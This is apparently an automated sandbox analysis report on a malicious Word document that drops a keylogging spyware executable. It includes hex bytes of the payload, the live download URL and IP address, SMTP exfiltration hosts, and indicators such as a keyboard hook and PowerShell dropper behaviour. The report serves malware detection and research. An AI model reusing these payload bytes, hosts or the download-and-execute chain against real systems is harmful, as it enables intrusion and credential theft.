00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:14:59 GMTContent-Type: application/octet-streamContent-Length: 777216Last-Modified: Thu, 25 Nov 2021 03:51:30 GMTConnection: keep-aliveETag: "619f0842-bdc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.199.225:587
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.199.223:587
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.199.224:587
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.91.199.225:587
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 208.91.199.223:587
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.2
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/t
                    Source: powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/taskmg.
                    Source: powershell.exe, 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.419023647.0000000002C91000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.418378144.00000000004A4000.00000004.00000040.sdmpString found in binary or memory: httP://173.232.204.89/taskmg.exe
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmpString found in binary or memory: httP://173.232.204.89/taskmg.exePE
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: powershell.exe, 00000003.00000002.430015540.0000000003749000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmpString found in binary or memory: http://173.232.204.89
                    Source: powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmpString found in binary or memory: http://173.232.204.89/taskmg.exe
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpString found in binary or memory: http://EW9kaPSTVWDzFNsliGsC.org
                    Source: taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpString found in binary or memory: http://EW9kaPSTVWDzFNsliGsC.org(Zgt
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://GwvXXB.com
                    Source: powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmpString found in binary or memory: http://java.co_w
                    Source: powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpString found in binary or memory: http://java.cohe
                    Source: powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: schtasks.exe, 0000000C.00000002.437567787.0000000000740000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                    Source: powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: taskmg.exe, 0000000E.00000002.705002661.00000000027F0000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                    Source: taskmg.exe, 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, taskmg.exe, 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmpJump to behavior
                    Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 173.232.204.89Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.232.204.89

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Installs a global keyboard hookShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\taskmg.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary:

                    barindex
                    Document contains OLE streams with names of living off the land binariesShow sources
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369208/\x1Ole10Native' : T}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.|.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369236/\x1Ole10Native' : D~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Powershell drops PE fileShow sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\taskmg.exeJump to dropped file
                    .NET source code contains very large array initializationsShow sources
                    Source: 14.0.taskmg.exe.400000.13.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Source: 14.0.taskmg.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Source: 14.2.taskmg.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Source: 14.0.taskmg.exe.400000.11.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                    Microsoft Office creates scripting filesShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Office process drops PE fileShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exeJump to dropped file
                    Document contains a stream with embedded javascript codeShow sources
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369208/\x1Ole10Native' : Found JS content: T}....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaDw\abdtfhghgeghDp..ScT.|............................................................................................................................................................
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drStream path '_1699369236/\x1Ole10Native' : Found JS content: D~....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..|.....................................................................................................................................
                    Found suspicious RTF objectsShow sources
                    Source: abdtfhgXgeghDp.ScTStatic RTF information: Object: 0 Offset: 000007DAh abdtfhgXgeghDp.ScT
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE indicator application name: unknown
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_012DA2A99_2_012DA2A9
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B4AE09_2_002B4AE0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B59209_2_002B5920
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B59109_2_002B5910
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B5B709_2_002B5B70
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_012DA0359_2_012DA035
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_012DA2A914_2_012DA2A9
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_005865D814_2_005865D8
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_005859C014_2_005859C0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00585D0814_2_00585D08
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_0058229714_2_00582297
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_007228F014_2_007228F0
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00721A9014_2_00721A90
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_0072791514_2_00727915
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_0072004814_2_00720048
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_0072200814_2_00722008
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_0072089814_2_00720898
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_0072074814_2_00720748
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4004814_2_00C40048
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4885814_2_00C48858
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4343014_2_00C43430
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4F32014_2_00C4F320
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4C28814_2_00C4C288
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_012DA03514_2_012DA035
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                    Source: 00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE indicator has summary info: false
                    Source: taskmg[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: taskmg.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: gZfDBpJYZ.exe.9.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$confirm The Details.docJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@21/27@9/5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE document summary: author field not present or empty
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drOLE document summary: edited time not present or 0
                    Source: Reconfirm The Details.docReversingLabs: Detection: 29%
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................7.....p.........7.......2.....`I4........v.....................K;.....................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................2k....8.................W.............}..v............0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................"l.....6.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................2k......................W.............}..v....(.......0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.W.............}..v....8.......0................"l.....".......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................2k......................W.............}..v....p.......0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............B.2k....P%l...............W.............}..v....8.......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................2k......................W.............}..v....p.......0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............B.2k....P%l...............W.............}..v....8.......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................2k......................W.............}..v....p.......0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k.m.g...e.x.e.'.............."l.....D.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................2k......................W.............}..v............0................"l.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............B.2k....P%l...............W.............}..v....X.......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................2k......................W.............}..v............0................"l.............................Jump to behavior
